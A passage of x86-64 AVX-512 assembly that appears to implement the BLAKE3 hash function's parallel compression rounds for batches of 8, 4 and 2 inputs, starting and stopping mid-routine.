vpaddd ymm2, ymm2, ymm30
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm23
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm19
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm20
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm21
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm16
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm24
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm28
vpaddd ymm1, ymm1, ymm25
vpaddd ymm2, ymm2, ymm31
vpaddd ymm3, ymm3, ymm30
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm29
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm26
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm23
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm16
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm18
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm17
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm25
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm24
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm30
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm28
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm29
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm18
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm19
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm22
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm27
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm17
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm31
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm25
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm30
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm19
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm26
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm20
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpxor ymm0, ymm0, ymm8
vpxor ymm1, ymm1, ymm9
vpxor ymm2, ymm2, ymm10
vpxor ymm3, ymm3, ymm11
vpxor ymm4, ymm4, ymm12
vpxor ymm5, ymm5, ymm13
vpxor ymm6, ymm6, ymm14
vpxor ymm7, ymm7, ymm15
movzx eax, byte ptr [rbp+0x38]
jne 2b
mov rbx, qword ptr [rbp+0x50]
vunpcklps ymm8, ymm0, ymm1
vunpcklps ymm9, ymm2, ymm3
vunpckhps ymm10, ymm0, ymm1
vunpcklps ymm11, ymm4, ymm5
vunpcklps ymm0, ymm6, ymm7
vshufps ymm12, ymm8, ymm9, 78
vblendps ymm1, ymm8, ymm12, 0xCC
vshufps ymm8, ymm11, ymm0, 78
vunpckhps ymm13, ymm2, ymm3
vblendps ymm2, ymm11, ymm8, 0xCC
vblendps ymm3, ymm12, ymm9, 0xCC
vperm2f128 ymm12, ymm1, ymm2, 0x20
vmovups ymmword ptr [rbx], ymm12
vunpckhps ymm14, ymm4, ymm5
vblendps ymm4, ymm8, ymm0, 0xCC
vunpckhps ymm15, ymm6, ymm7
vperm2f128 ymm7, ymm3, ymm4, 0x20
vmovups ymmword ptr [rbx+0x20], ymm7
vshufps ymm5, ymm10, ymm13, 78
vblendps ymm6, ymm5, ymm13, 0xCC
vshufps ymm13, ymm14, ymm15, 78
vblendps ymm10, ymm10, ymm5, 0xCC
vblendps ymm14, ymm14, ymm13, 0xCC
vperm2f128 ymm8, ymm10, ymm14, 0x20
vmovups ymmword ptr [rbx+0x40], ymm8
vblendps ymm15, ymm13, ymm15, 0xCC
vperm2f128 ymm13, ymm6, ymm15, 0x20
vmovups ymmword ptr [rbx+0x60], ymm13
vperm2f128 ymm9, ymm1, ymm2, 0x31
vperm2f128 ymm11, ymm3, ymm4, 0x31
vmovups ymmword ptr [rbx+0x80], ymm9
vperm2f128 ymm14, ymm10, ymm14, 0x31
vperm2f128 ymm15, ymm6, ymm15, 0x31
vmovups ymmword ptr [rbx+0xA0], ymm11
vmovups ymmword ptr [rbx+0xC0], ymm14
vmovups ymmword ptr [rbx+0xE0], ymm15
vmovdqa ymm0, ymmword ptr [rsp]
vmovdqa ymm2, ymmword ptr [rsp+0x2*0x20]
vmovdqa32 ymm0 {k1}, ymmword ptr [rsp+0x1*0x20]
vmovdqa32 ymm2 {k1}, ymmword ptr [rsp+0x3*0x20]
vmovdqa ymmword ptr [rsp], ymm0
vmovdqa ymmword ptr [rsp+0x2*0x20], ymm2
add rbx, 256
mov qword ptr [rbp+0x50], rbx
add rdi, 64
sub rsi, 8
3:
mov rbx, qword ptr [rbp+0x50]
mov r15, qword ptr [rsp+0x80]
movzx r13, byte ptr [rbp+0x38]
movzx r12, byte ptr [rbp+0x48]
test esi, 0x4
je 3f
vbroadcasti32x4 zmm0, xmmword ptr [rcx]
vbroadcasti32x4 zmm1, xmmword ptr [rcx+0x1*0x10]
vmovdqa xmm12, xmmword ptr [rsp]
vmovdqa xmm13, xmmword ptr [rsp+0x4*0x10]
vpunpckldq xmm14, xmm12, xmm13
vpunpckhdq xmm15, xmm12, xmm13
vpermq ymm14, ymm14, 0xDC
vpermq ymm15, ymm15, 0xDC
vpbroadcastd zmm12, dword ptr [BLAKE3_BLOCK_LEN+rip]
vinserti64x4 zmm13, zmm14, ymm15, 0x01
mov eax, 17476
kmovw k2, eax
vpblendmd zmm13 {k2}, zmm13, zmm12
vbroadcasti32x4 zmm15, xmmword ptr [BLAKE3_IV+rip]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov eax, 43690
kmovw k3, eax
mov eax, 34952
kmovw k4, eax
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x88], eax
vmovdqa32 zmm2, zmm15
vpbroadcastd zmm8, dword ptr [rsp+0x22*0x4]
vpblendmd zmm3 {k4}, zmm13, zmm8
vmovups zmm8, zmmword ptr [r8+rdx-0x1*0x40]
vinserti32x4 zmm8, zmm8, xmmword ptr [r9+rdx-0x4*0x10], 0x01
vinserti32x4 zmm8, zmm8, xmmword ptr [r10+rdx-0x4*0x10], 0x02
vinserti32x4 zmm8, zmm8, xmmword ptr [r11+rdx-0x4*0x10], 0x03
vmovups zmm9, zmmword ptr [r8+rdx-0x30]
vinserti32x4 zmm9, zmm9, xmmword ptr [r9+rdx-0x3*0x10], 0x01
vinserti32x4 zmm9, zmm9, xmmword ptr [r10+rdx-0x3*0x10], 0x02
vinserti32x4 zmm9, zmm9, xmmword ptr [r11+rdx-0x3*0x10], 0x03
vshufps zmm4, zmm8, zmm9, 136
vshufps zmm5, zmm8, zmm9, 221
vmovups zmm8, zmmword ptr [r8+rdx-0x20]
vinserti32x4 zmm8, zmm8, xmmword ptr [r9+rdx-0x2*0x10], 0x01
vinserti32x4 zmm8, zmm8, xmmword ptr [r10+rdx-0x2*0x10], 0x02
vinserti32x4 zmm8, zmm8, xmmword ptr [r11+rdx-0x2*0x10], 0x03
vmovups zmm9, zmmword ptr [r8+rdx-0x10]
vinserti32x4 zmm9, zmm9, xmmword ptr [r9+rdx-0x1*0x10], 0x01
vinserti32x4 zmm9, zmm9, xmmword ptr [r10+rdx-0x1*0x10], 0x02
vinserti32x4 zmm9, zmm9, xmmword ptr [r11+rdx-0x1*0x10], 0x03
vshufps zmm6, zmm8, zmm9, 136
vshufps zmm7, zmm8, zmm9, 221
vpshufd zmm6, zmm6, 0x93
vpshufd zmm7, zmm7, 0x93
mov al, 7
9:
vpaddd zmm0, zmm0, zmm4
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 16
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 12
vpaddd zmm0, zmm0, zmm5
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 8
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 7
vpshufd zmm0, zmm0, 0x93
vpshufd zmm3, zmm3, 0x4E
vpshufd zmm2, zmm2, 0x39
vpaddd zmm0, zmm0, zmm6
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 16
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 12
vpaddd zmm0, zmm0, zmm7
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 8
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 7
vpshufd zmm0, zmm0, 0x39
vpshufd zmm3, zmm3, 0x4E
vpshufd zmm2, zmm2, 0x93
dec al
jz 9f
vshufps zmm8, zmm4, zmm5, 214
vpshufd zmm9, zmm4, 0x0F
vpshufd zmm4, zmm8, 0x39
vshufps zmm8, zmm6, zmm7, 250
vpblendmd zmm9 {k3}, zmm9, zmm8
vpunpcklqdq zmm8, zmm7, zmm5
vpblendmd zmm8 {k4}, zmm8, zmm6
vpshufd zmm8, zmm8, 0x78
vpunpckhdq zmm5, zmm5, zmm7
vpunpckldq zmm6, zmm6, zmm5
vpshufd zmm7, zmm6, 0x1E
vmovdqa32 zmm5, zmm9
vmovdqa32 zmm6, zmm8
jmp 9b
9:
vpxord zmm0, zmm0, zmm2
vpxord zmm1, zmm1, zmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vextracti32x4 xmmword ptr [rbx+0x4*0x10], zmm0, 0x02
vextracti32x4 xmmword ptr [rbx+0x5*0x10], zmm1, 0x02
vextracti32x4 xmmword ptr [rbx+0x6*0x10], zmm0, 0x03
vextracti32x4 xmmword ptr [rbx+0x7*0x10], zmm1, 0x03
vmovdqa xmm0, xmmword ptr [rsp]
vmovdqa xmm2, xmmword ptr [rsp+0x40]
vmovdqa32 xmm0 {k1}, xmmword ptr [rsp+0x1*0x10]
vmovdqa32 xmm2 {k1}, xmmword ptr [rsp+0x5*0x10]
vmovdqa xmmword ptr [rsp], xmm0
vmovdqa xmmword ptr [rsp+0x40], xmm2
add rbx, 128
add rdi, 32
sub rsi, 4
3:
test esi, 0x2
je 3f
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovd xmm13, dword ptr [rsp]
vpinsrd xmm13, xmm13, dword ptr [rsp+0x40], 1
vpinsrd xmm13, xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovd xmm14, dword ptr [rsp+0x4]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x44], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vinserti128 ymm13, ymm13, xmm14, 0x01
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x88], eax
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vpbroadcastd ymm8, dword ptr [rsp+0x88]
vpblendd ymm3, ymm13, ymm8, 0x88
vmovups ymm8, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm8, ymm9, 136
vshufps ymm5, ymm8, ymm9, 221
vmovups ymm8, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm8, ymm9, 136
vshufps ymm7, ymm8, ymm9, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 16
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 12
vpaddd ymm0, ymm0, ymm5
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 8
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 7
vpshufd ymm0, ymm0, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 16
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 12
vpaddd ymm0, ymm0, ymm7
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 8
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 7
vpshufd ymm0, ymm0, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x93
dec al
jz 9f
vshufps ymm8, ymm4, ymm5, 214
vpshufd ymm9, ymm4, 0x0F
vpshufd ymm4, ymm8, 0x39
vshufps ymm8, ymm6, ymm7, 250
vpblendd ymm9, ymm9, ymm8, 0xAA
vpunpcklqdq ymm8, ymm7, ymm5
vpblendd ymm8, ymm8, ymm6, 0x88
vpshufd ymm8, ymm8, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymm5, ymm9
vmovdqa ymm6, ymm8
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovdqa xmm0, xmmword ptr [rsp]
vmovdqa xmm2, xmmword ptr [rsp+0x4*0x10]
vmovdqu32 xmm0 {k1}, xmmword ptr [rsp+0x8]
vmovdqu32 xmm2 {k1}, xmmword ptr [rsp+0x48]
vmovdqa xmmword ptr [rsp], xmm0
vmovdqa xmmword ptr [rsp+0x4*0x10], xmm2
add rbx, 64
add rdi, 16
sub rsi, 2
3:
test esi, 0x1
je 4b
vmovdqu xmm0, xmmword ptr [rcx]
vmovdqu xmm1, xmmword ptr [rcx+0x10]
vmovd xmm14, dword ptr [rsp]
